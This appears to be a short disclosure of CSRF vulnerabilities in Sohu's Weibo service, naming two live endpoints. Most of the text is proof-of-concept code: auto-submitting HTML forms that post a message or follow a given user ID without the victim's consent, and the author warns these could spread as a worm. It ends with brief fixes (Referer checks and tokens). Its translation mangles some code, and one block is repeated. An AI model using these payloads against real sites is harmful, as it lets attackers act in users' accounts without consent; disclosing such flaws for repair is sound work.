A csrf vulnerability in Sohu may cause worms to spread. Weibo is published without the user's consent.
Detailed description:
When receiving the POST and GET information, the Referer is not verified, and the token is not added to the POST information to verify the correctness of the information, resulting in a vulnerability.
Vulnerability address:
Http://t.sohu.com/t/twAction.jsp
<Html> www.2cto.com
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://t.sohu.com/t/twAction.jsp" method = "post">
<Input type = "text" name = "msg" value = "XX"/>
<Input type = "text" name = "act" value = "insertTwitter"/>
<Input type = "text" name = "groupid" value = "0"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
Interface return information
Effect
Second
Http://t.sohu.com/t/twAction.jsp
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://t.sohu.com/t/twAction.jsp" method = "post">
<Input type = "text" name = "msg" value = "XX"/>
<Input type = "text" name = "act" value = "insertTwitter"/>
<Input type = "text" name = "groupid" value = "0"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
Response Information
Effect
Third:
Vulnerability address:
Http://t.sohu.com/follow/addfollows
<Html> www.2cto.com
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://t.sohu.com/follow/addfollows" method = "post">
<Input type = "text" name = "act" value = "follow"/>
<Input type = "text" name = "friendids" value = "23117291"/>
<Input type = "text" name = "uid" value = "23117291"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
Interface return information
Effect
Solution:
Check POST Referer
Add token in POST information
Author: imlonghao